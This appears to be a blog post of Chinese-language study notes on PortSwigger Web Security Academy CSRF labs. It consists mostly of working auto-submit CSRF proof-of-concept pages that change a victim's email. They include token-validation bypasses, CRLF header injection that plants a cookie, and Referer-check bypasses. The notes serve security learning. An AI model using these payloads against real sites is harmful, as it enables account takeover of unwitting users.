CSRF
受条件限制
特殊操作,cookie,不可预知的参数
获取邮箱的恶意HTML网页
<html>
<body>
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
CSRF令牌的请求方法漏洞
<html>
<body>
<form action="https://0ad6000d04bf4bffc11b53ab00a400d5.web-security-academy.net/my-account/change-email?email=1@qq.com" method="GET">
//<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
CSRF令牌的验证缺陷(没有csrf则跳过验证)
<html>
<body>
<form action="https://0a9a00bd04340d2fc095311400c60006.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
这样的恶意HTML代码是错误的,这只是将 csrf 置空 "Missing parameter 'csrf'"
<html>
<body>
<form action="https://0a9a00bd04340d2fc095311400c60006.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="ccc@evil-user.net" />
<input type="hidden" name="csrf" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
CSRF(任意的csrf令牌都会发挥作用)(这里边的csrf令牌任意用户的,只要是有效的)
<html>
<body>
<form action="https://0a9000db03b8fc5cc120129500fc0035.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="ccc@evil-user.net" />
<input type="hidden" name="csrf" value="opdKCgPE9AWy690LIIcLS4KhVkWxZlhC" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
CSRF csrfkey与cookie无关联
cookie值:
Cookie: csrfKey=oR6cmUMTRaRgCpEJLh76XfPgI64LvgwA; session=lo5OifxlXUpyGujmIfslYXONJMQTeZM9
post值:
email=1%40qq.com&csrf=fi8qifJlHFgIccJkQPTCIzOkE4muzk8i
csrf只与csrfkey有关,与用户身份无关
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a2b003a0437155cc56aa6e7001500e5.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@qq.com" />
<input type="hidden" name="csrf" value="fi8qifJlHFgIccJkQPTCIzOkE4muzk8i" />
<img src="https://0a2b003a0437155cc56aa6e7001500e5.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=oR6cmUMTRaRgCpEJLh76XfPgI64LvgwA%3b%20SameSite=None" onerror="document.forms[0].submit()">
</form>
</body>
</html>
CLRF注入
<img src="https://0a2b003a0437155cc56aa6e7001500e5.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=oR6cmUMTRaRgCpEJLh76XfPgI64LvgwA%3b%20SameSite=None" onerror="document.forms[0].submit()">
CSRF cookie中的csrf与post的csrf相同,同样需要利用CLRF注入,修改受害者的cookie,与上一个例子相似
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a4500e803b09de9c05c647f00f20069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@qq.com" />
<input type="hidden" name="csrf" value="KhGREIHK2gaUZiBUKHikhCSpzHN2LMue" />
<img src="https://0a4500e803b09de9c05c647f00f20069.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=KhGREIHK2gaUZiBUKHikhCSpzHN2LMue%3b%20SameSite=None" onerror="document.forms[0].submit()">
</form>
</body>
</html>
CSRF 之 验证 referer (request中的是 Referer ,但是这个标签中的是 referrer )
Meta 的 referrer 干什么用 - 简书 (jianshu.com)
这是经典的恶意代码
<html>
<body>
<form action="https://0ad0009c045eb451c087955f00ab00f2.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="ccc@evil-user.net" />
<meta name="referrer" content="no-referrer">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
这是用 csrf poc 自动产生的 做了修改,但是没生效。(可能是这里的提交是submit,而上边的是自动提交。)
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0ad0009c045eb451c087955f00ab00f2.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@qq.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF 验证Referer中是否包含本身域名,在历史记录中插入一条包含易受攻击网站的地址
http请求的时候Referrer-Policy是什么鬼? - 简书 (jianshu.com)
history对象history.pushState()和history.replaceState() - 掘金 (juejin.cn)
Head中(这个head是响应中的head,受配置文件等影响):
Referrer-Policy: unsafe-url
Body中:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/?https://0aaf0070045c8d92c236709c00e500a4.web-security-academy.net/my-account')</script>
<form action="https://0aaf0070045c8d92c236709c00e500a4.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@qq.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
这个exploit就很好用,响应头中的head可以很简单的配置。
下边这个是不修改其他配置文件下使用,但是需要保证安全等级不变。
payload 2(自己伪造的,先在本地试验了,又在靶场环境中成功,为了摆脱服务器端响应头的限制) :
<meta name="referrer" content="no-referrer-when-downgrade">
该标签使在安全等级不下降低的情况下保留referer
<html>
<head>
<meta name="referrer" content="no-referrer-when-downgrade">
</head>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/?https://0a96002203357dbfc09a369e004600cc.web-security-academy.net/my-account')</script>
<form action="https://0a96002203357dbfc09a369e004600cc.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@qq.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
浙公网安备 33010602011771号